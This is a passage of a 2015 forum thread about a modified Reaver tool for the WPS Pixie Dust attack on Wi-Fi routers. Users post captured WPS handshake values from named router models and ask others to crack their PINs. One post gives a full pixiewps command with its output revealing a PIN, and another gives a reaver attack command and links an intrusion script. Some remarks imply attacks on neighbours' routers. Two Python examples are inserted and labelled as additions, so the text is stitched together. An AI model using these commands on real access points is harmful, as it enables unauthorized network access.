
Thread: Reaver modification for Pixie Dust Attack

  1. #51
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by soxrok2212 View Post
    without small keys.

    Code:
    Manufacturer: 
    Model: 
    Model Number: 
    Serial Number: 
    E-Nonce: 
    PKE: 
    PKR: 
    E-Hash1: 
    E-Hash2: 
    Authkey:
    Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.
    Hello soxrox2212,

    Code:
    Manufacturer: AirTies Wireless Networks
    Model:AirTies Air5650
    Model Number: 1.0.2.0
    Serial Number: AT1731430001111
    E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
    PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e:ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e:78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:66:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb:73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15:aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42:d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d:e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:fa:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6:6d:e3:d9:60:3a:89:70:c3:2c:81
     
    PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2:73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05:35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:bf:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0:6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78:f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:94:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb:bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4:16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8:ff:a8:09:a3:ec:6f:e7:ae:8d:0e   (without -S)
    
    PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02  (with -S)
    
    E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf 
    
    E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80
    
    Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86
    Pixie is invulnerable for this modem. I wanna ask, maybe there is a combination,

    Example ;

    EHASH1=EHASH2=Serial number?...

    Can you try to find this modem's pin?

    Thanks
    Last edited by Saydamination; 2015-05-16 at 21:16.

  2. #52
    Join Date
    2015-Apr
    Posts
    15
    Hello,

    a suggestion for wash:
    can you add some kind of oui-support (like the -M switch in aircrack) ?

    Thanks.

  3. #53
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by SeaF0ur View Post
    In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? a full handshake right? and then a separate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?
    For you to crack, all you need is t6_x's version of Reaver and pixiewps. For us to analyze, we need a cap of the wps exchange and the output of reaver.
    Last edited by soxrok2212; 2015-05-04 at 21:28.

  4. #54
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Saydamination View Post
    Hello soxrox2212,

    Code:
    Manufacturer: AirTies Wireless Networks
    Model:AirTies Air5650
    Model Number: 1.0.2.0
    Serial Number: AT1731430006993
    E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
    PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e:ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e:78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:66:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb:73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15:aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42:d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d:e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:fa:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6:6d:e3:d9:60:3a:89:70:c3:2c:81
     
    PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2:73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05:35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:bf:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0:6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78:f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:94:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb:bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4:16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8:ff:a8:09:a3:ec:6f:e7:ae:8d:0e   (without -S)
    
    PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02  (with -S)
    
    E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf 
    
    E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80
    
    Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86
    Pixie is invulnerable for this modem. I wanna ask, maybe there is a combination,

    Example ;

    EHASH1=EHASH2=Serial number?...

    Can you try to find this modem's pin?

    Thanks
    While this is certainly possible, I highly doubt that E-S1 = E-S2 = Serial number for a few reasons:

    1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

    2- Serial numbers can vary in length and conversion to HEX would give us a different length of data than we need.
    Last edited by soxrok2212; 2015-04-20 at 13:09.

  5. #55
    Join Date
    2013-Sep
    Posts
    262
    1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.
    very good point.
    Last edited by kcdtv; 2015-04-20 at 13:19. Reason: spelling

  6. #56
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    Maybe some of it will be useful:
    http://rpc.one.pl/pliki/openwrt/back...cja/README-WPS

    Focus on TP-LINK TL-WR740N
    Is it possible to invent something?

  7. #57
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by slmafiq View Post
    Maybe some of it will be useful:
    http://rpc.one.pl/pliki/openwrt/back...cja/README-WPS

    Focus on TP-LINK TL-WR740N
    Is it possible to invent something?
    Theoretically, yes.

    But not in practice: the sample space to brute-force ends up being very large, bordering on "infinity", so the time for the brute force ends up being a few decades.

    There are some TP-Link models with old firmware where the key generation is based on the router's time; those, yes, can be attacked, but I believe they are very rare nowadays. So far I have not found any, only the one I have here at home, which is from around 2005-2007, I don't remember.

    Firmware analysis takes too long and is an absurdly boring job; it may be that over time some news appears.

  8. #58
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    Thank you for your attention!
    Would it be more convenient to create an "Evil Twin attack"?
    Are you familiar with this?

  9. #59
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    For you to crack, all you need is t6_x's version of Reaver. For us to analyze, we need a cap of the wps exchange and the output of reaver.
    Cracking's no issue... Would it be best to start with an evil twin to get the handshake cap? or would a wireshark cap with mdk3 running be sufficient?

  10. #60
    Join Date
    2015-Apr
    Posts
    9
    How can I make reaver send M2 without sending M1?

  11. #61
    Join Date
    2015-Apr
    Posts
    28
    Hi T6_x,

    Which MAC address is the original MAC on the modem? wlan0-1? wlan0 = F8:1A:67.... wlan0-1 = FA:1A:67....??

    Probably you can update something with this information...




    br-admin Link encap:Ethernet HWaddr F8:1A:67:40:02:33
    inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    br-lan Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:172.25.10.230 Bcast:172.25.255.255 Mask:255.255.0.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1044 errors:0 dropped:26 overruns:0 frame:0
    TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:59454 (58.0 KiB) TX bytes:12990 (12.6 KiB)

    br-public Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:10.10.20.230 Bcast:10.10.20.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1 errors:0 dropped:0 overruns:0 frame:0
    TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:46 (46.0 B) TX bytes:402 (402.0 B)

    eth0 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:316366 errors:0 dropped:3 overruns:0 frame:0
    TX packets:54223 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:69817474 (66.5 MiB) TX bytes:8268306 (7.8 MiB)
    Interrupt:5

    eth0.1 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:169.10.10.254 Bcast:255.255.255.255 Mask:255.255.255.255
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    eth0.2 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1169 errors:0 dropped:1 overruns:0 frame:0
    TX packets:96 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:95730 (93.4 KiB) TX bytes:13036 (12.7 KiB)

    eth0.3 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:46 (46.0 B) TX bytes:448 (448.0 B)

    eth1 Link encap:Ethernet HWaddr F8:1A:67:40:02:33
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    Interrupt:4

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:174 errors:0 dropped:0 overruns:0 frame:0
    TX packets:174 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:12833 (12.5 KiB) TX bytes:12833 (12.5 KiB)

    wlan0 Link encap:Ethernet HWaddr F8:1A:67:40:02:32
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:376 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:31239 (30.5 KiB)

    wlan0-1 Link encap:Ethernet HWaddr FA:1A:67:40:02:33
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:28963 (28.2 KiB)

    wlan0-2 Link encap:Ethernet HWaddr FA:1A:67:40:02:34
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:64 (64.0 B)
    Last edited by Saydamination; 2015-04-25 at 19:00. Reason: alright
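    As an added example (not code from the thread, reaver or any router firmware), the question above can be answered by checking the IEEE "locally administered" bit of each address: the script below parses the interface/HWaddr lines of the ifconfig dump posted in this message and reports which addresses are vendor-assigned and which are software-derived. The regex, the function names and the trimmed sample (only the HWaddr lines from the post are kept) are mine.

```python
"""Classify the hardware addresses in an ifconfig dump by the IEEE U/L bit.

Added example, not code from the thread or from reaver. The first octet of a
MAC address carries two flag bits: 0x01 is the I/G (group) bit and 0x02 is
the U/L bit. U/L = 0 means universally administered (burned in by the vendor,
first three octets are the OUI); U/L = 1 means locally administered, which is
how drivers usually mint addresses for extra virtual BSS interfaces.
"""
import re

# Sample input: the interface/HWaddr lines from the ifconfig dump posted
# above (IP and counter lines dropped; they do not matter for this check).
IFCONFIG_SAMPLE = """\
br-admin Link encap:Ethernet HWaddr F8:1A:67:40:02:33
br-lan Link encap:Ethernet HWaddr F8:1A:67:40:02:31
eth0 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
eth1 Link encap:Ethernet HWaddr F8:1A:67:40:02:33
lo Link encap:Local Loopback
wlan0 Link encap:Ethernet HWaddr F8:1A:67:40:02:32
wlan0-1 Link encap:Ethernet HWaddr FA:1A:67:40:02:33
wlan0-2 Link encap:Ethernet HWaddr FA:1A:67:40:02:34
"""

HWADDR_RE = re.compile(
    r"^\s*(\S+)\s+Link encap:\S+.*?HWaddr\s+([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})",
    re.M,
)


def parse_hwaddrs(text):
    """Return (interface, MAC) pairs; interfaces without a HWaddr (lo) are skipped."""
    return [(iface, mac.upper()) for iface, mac in HWADDR_RE.findall(text)]


def classify_mac(mac):
    """Split a MAC into its OUI and the two flag bits of the first octet."""
    first = int(mac.split(":")[0], 16)
    return {
        "mac": mac,
        "oui": mac[:8],
        "locally_administered": bool(first & 0x02),
        "group": bool(first & 0x01),
    }


def vendor_base(mac):
    """Clear the U/L bit: FA:1A:67:... -> F8:1A:67:... (heuristic: a virtual
    interface's address is usually the burned-in one with that bit set)."""
    octets = mac.split(":")
    octets[0] = "%02X" % (int(octets[0], 16) & ~0x02)
    return ":".join(octets)


def report(text):
    """Map each interface in an ifconfig dump to its classification."""
    out = {}
    for iface, mac in parse_hwaddrs(text):
        info = classify_mac(mac)
        info["base"] = vendor_base(mac) if info["locally_administered"] else mac
        out[iface] = info
    return out


if __name__ == "__main__":
    for iface, info in report(IFCONFIG_SAMPLE).items():
        kind = "locally administered" if info["locally_administered"] else "vendor-assigned"
        print(f"{iface:8} {info['mac']}  {kind:20}  OUI {info['oui']}  base {info['base']}")
```

    On this dump every address shares the OUI F8:1A:67. wlan0's F8:1A:67:40:02:32 has the U/L bit clear, while wlan0-1 and wlan0-2 (FA:1A:67:...) have it set, so the FA: addresses are software-derived ones for the extra virtual BSSes rather than the burned-in address. Vendor lookup of the OUI (the kind of -M style support asked for in #52) would be a plain table lookup of info['oui'] against a local copy of the IEEE OUI list.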

  12. #62
    Join Date
    2015-Apr
    Posts
    39
    This happens sometimes, but it is difficult to create a solution, since each firmware works in a different way.

    Because it is not something generic, it is difficult to create a solution.

  13. #63
    Join Date
    2015-Mar
    Posts
    127
    Any use for the -D, --daemonize option of Reaver?

    Benefits, specials cases?

  14. #64
    Join Date
    2015-Mar
    Posts
    127
    Getting the -m error when reaver tries to use pixiewps. That error has been explained as a new feature pre-release for new version 1.1

    I can work around that issue and just hand cut and paste hashes like the old'n days.

    But now reaver 1.5.2 downloaded from git today won't associate with even the neighborhood ***** router.
    Used aireplay-ng to associate with the router and she dropped her drawers. And let me right in there.
    Then I used the -A option with reaver and it connected and got hashes but then -m.

    Am I the only one?
    Last edited by nuroo; 2015-04-29 at 00:33.

  15. #65
    Join Date
    2013-Jul
    Posts
    818
    Musket Teams have voted to release their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh a WPS locked intrusion script. But it can work with any text file output from modded reaver programs showing both PKE and PKR.

    PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust Sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle thru all the other sequences as required.

    If you are not using VMR-MDK009x2 then simply use the command line:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP

    The reaver command line side can be altered as required however the -vv must remain or no data will be written.

    There is a help file in the download.

    You can download at two(2) locations

    PDDSA-01.sh has been updated to support routers giving altered text output,

    You can download PDDSA-02.sh at:

    http://www.datafilehost.com/d/e6a13191

    or thru aircrack-ng forums see thread

    http://forum.aircrack-ng.org/index.p...ic,868.15.html

    See thread 21

    MTeams
    Last edited by mmusket33; 2015-04-29 at 13:08.
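    As an added example (not the PDDSA-01.sh script above and not reaver's or pixiewps' own code), here is the kind of parsing and sanity checking a tool like PDDSA has to do before it can call a text block a "valid Pixie Dust sequence": it reads the `Manufacturer: / E-Nonce: / PKE: / PKR: / E-Hash1: ...` format posted in #51, checks that each required field is present with the byte length the WPS registration protocol fixes (which also makes concrete the length point made in #54: every one of these inputs has a fixed size), and flags a PKR equal to the DH generator 2, which is what the "(with -S)" line in #51 shows. The sample dump is constructed: E-Nonce, E-Hash1/2 and Authkey are the values posted in #51, PKE is a synthetic 192-byte pattern, and REQUIRED_LEN, parse_dump and check_dump are my names.

```python
"""Parse and sanity-check a Pixie Dust data dump from a modded reaver run.

Added example: not the thread's PDDSA-01.sh and not reaver's or pixiewps'
own code. It reads the 'Manufacturer: / E-Nonce: / PKE: / PKR: / E-Hash1:'
text block format posted in this thread, checks that every field a Pixie
Dust analysis needs is present with the byte length the WPS registration
protocol fixes, and flags a registrar key equal to the DH generator 2, which
is the '(with -S)' PKR shown in post #51.
"""
import re

# Byte lengths fixed by the WPS spec (DH group: 1536-bit MODP, generator 2).
REQUIRED_LEN = {
    "enonce": 16,    # enrollee nonce N1
    "pke": 192,      # enrollee DH public key
    "pkr": 192,      # registrar DH public key
    "ehash1": 32,    # HMAC-SHA256 over E-S1 || PSK1 || PKE || PKR
    "ehash2": 32,    # HMAC-SHA256 over E-S2 || PSK2 || PKE || PKR
    "authkey": 32,   # AuthKey derived from the DH shared secret
}
OPTIONAL = ("manufacturer", "model", "modelnumber", "serialnumber")

# A run of colon-separated hex bytes; anything after it ('(with -S)') is ignored.
HEX_RE = re.compile(r"[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2})+")


def normalize_key(label):
    """'E-Hash1' -> 'ehash1', 'Model Number' -> 'modelnumber'."""
    return re.sub(r"[^a-z0-9]", "", label.lower())


def parse_dump(text):
    """Map field name -> value. Hex fields become bytes, text fields str.
    If a hex field repeats (the posts show PKR twice, without and with -S),
    the last occurrence wins."""
    fields = {}
    for line in text.splitlines():
        label, sep, rest = line.partition(":")
        if not sep:
            continue
        key = normalize_key(label)
        if key in REQUIRED_LEN:
            m = HEX_RE.search(rest)
            if m:
                fields[key] = bytes.fromhex(m.group(0).replace(":", ""))
        elif key in OPTIONAL:
            fields[key] = rest.strip()
    return fields


def check_dump(fields):
    """Return a list of findings. Empty means the dump is a complete,
    well-formed sequence (what PDDSA calls a valid Pixie Dust sequence)."""
    findings = []
    for key, want in REQUIRED_LEN.items():
        if key not in fields:
            findings.append(f"missing {key}")
        elif len(fields[key]) != want:
            findings.append(f"{key}: {len(fields[key])} bytes, expected {want}")
    pkr = fields.get("pkr")
    if pkr is not None and int.from_bytes(pkr, "big") == 2:
        findings.append("pkr is the DH generator 2: registrar used a small "
                        "private key (reaver -S)")
    return findings


# Constructed sample in the thread's dump format. E-Nonce, E-Hash1/2 and
# Authkey are the values posted for the AirTies device in #51; PKE is a
# synthetic 192-byte pattern (the real one is omitted for length) and PKR is
# the '(with -S)' form, 191 zero bytes followed by 0x02.
SAMPLE_DUMP = "\n".join([
    "Manufacturer: AirTies Wireless Networks",
    "Model:AirTies Air5650",
    "Model Number: 1.0.2.0",
    "Serial Number: AT1731430001111",
    "E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34",
    "PKE:" + ":".join("%02x" % (i % 256) for i in range(192)),
    "PKR:" + ":".join(["00"] * 191 + ["02"]) + "  (with -S)",
    "E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf",
    "E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80",
    "Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86",
])

if __name__ == "__main__":
    parsed = parse_dump(SAMPLE_DUMP)
    for k, v in parsed.items():
        print(f"{k:13} {v.hex()[:32] + '...' if isinstance(v, bytes) else v}")
    print("findings:", check_dump(parsed) or "none")
```

    A dump that fails check_dump is not worth feeding further: a truncated hash (a wrapped line that lost a byte, as happens when output is pasted into a forum) or a missing PKR is the usual reason a "sequence" produces nothing.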

  16. #66
    Join Date
    2015-Mar
    Posts
    141
    lol @ mmusket33 it's soxrok2212 not soxrox2212 or soxorx2212 (red sox reference maybe? ;-)), not to be pedantic...

  17. #67
    Join Date
    2013-Jul
    Posts
    818
    Thanks aanarchyy, we will correct that. If you find any bugs in the coding, we will reissue.

    MTEAMS

  18. #68
    Join Date
    2015-Mar
    Posts
    127
    @t6_x

    still hoping for a timer function for -g option

    -g <sec> # set timeout for chipset recovery...... next up date

  19. #69
    Join Date
    2015-Apr
    Posts
    9
    Technicolor TD5130

    pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -s f4:7b:17:b3:dc:de:29:b2:87:fa:39:ab:66:ce:21:a4:91:79:93:fc:d1:c5:48:ee:c0:c0:bb:27:4f:fd:ac:95 -z b7:a4:00:05:b2:31:b0:d7:53:96:a7:ce:2c:e0:50:8c:53:24:e8:66:75:24:7d:32:31:5c:36:ca:54:75:37:50 -r 4f:f3:c0:b0:63:76:0e:1b:8c:22:b4:8f:00:26:0b:fc:ce:84:f5:91:df:46:5a:d0:d7:e6:ec:65:a6:03:56:bb:c1:a8:10:db:34:7a:c3:29:c5:25:c3:9d:db:93:79:a2:1f:42:38:64:cf:93:1b:19:49:85:6c:48:2a:6a:88:c1:25:09:58:6e:2d:de:c1:a4:f2:5c:78:35:9e:8f:13:cc:81:9f:7f:0d:0d:7c:43:52:72:f2:b5:08:84:ed:e2:bc:5b:26:32:e7:bb:69:ec:40:2e:42:fc:ff:d8:aa:4c:c8:be:f2:e9:ae:b3:e8:82:6b:0e:1e:3e:fd:73:47:cb:72:b5:0e:f6:b4:ff:28:e4:67:8c:9d:2f:08:ee:d8:09:ab:0c:3f:02:44:73:72:93:35:70:6b:7f:8d:3f:8e:cc:f1:9d:51:40:42:1d:66:d7:d7:ee:61:9c:58:cc:2c:7b:0e:a4:64:b9:59:6a:76:e5:21:37:38:cb:b7:5c:1b:4d:36 -n 71:31:e9:e7:7b:a6:c7:f0:2d:6d:ac:d3:1e:fc:7b:1d -a a0:68:dd:b2:e5:5f:6e:55:54:37:b2:3b:71:cf:d5:a3:5b:14:15:23:49:33:77:17:79:f0:f4:cf:19:e1:09:1e -m f2:6c:ab:f5:0d:8f:a8:cf:f4:ab:9a:27:36:04:a4:3e -b 00:18:E7:******** -v 3 -f 4

    Pixiewps 1.1
    [*] PRNG Seed: 1317453909 (Sat Oct 1 07:25:09 2011)
    [*] PSK1: a6:6e:0e:6f:44:2c:6d:cf:ef:21:69:c0:55:e4:72:b7
    [*] PSK2: 73:87:3a:a1:84:e1:3a:30:fe:87:0c:93:fa:4e:f0:52
    [*] E-S1: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
    [*] E-S2: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
    [+] WPS pin: 65056851
    [*] Time taken: 695 s

  20. #70
    Join Date
    2015-Mar
    Posts
    8
    @popthattif please, what command in reaver did you use to get the 00:18:E7 ? Did it work on the 18:17:25 too ? I tried everything and nothing seems to work.

  21. #71
    Join Date
    2015-Apr
    Location
    Paraguay
    Posts
    3
    Hi, thanks. I just wanted to mention that after running apt-get dist-upgrade, it no longer works.
    After attempting different steps to try to fix it, the only thing that did it was to

    #apt-get purge libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    then
    #apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    and recompiling reaver and installing it again.
    Dunno if it was just me. But I was using a VM with 1.12 and my notebook as well. After upgrading Kali, it no longer worked. Same problem on both. But it is finally solved.

  22. #72
    Join Date
    2015-Mar
    Posts
    127
    Heard there may be a video tutorial soon, showing how to use the new pixiewps 1.1 with reaver??

    Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??

  23. #73
    For what it's worth, this version of reaver is now the default version in the main kali repo.
    More information:
    + http://git.kali.org/gitweb/?p=packag....git;a=summary
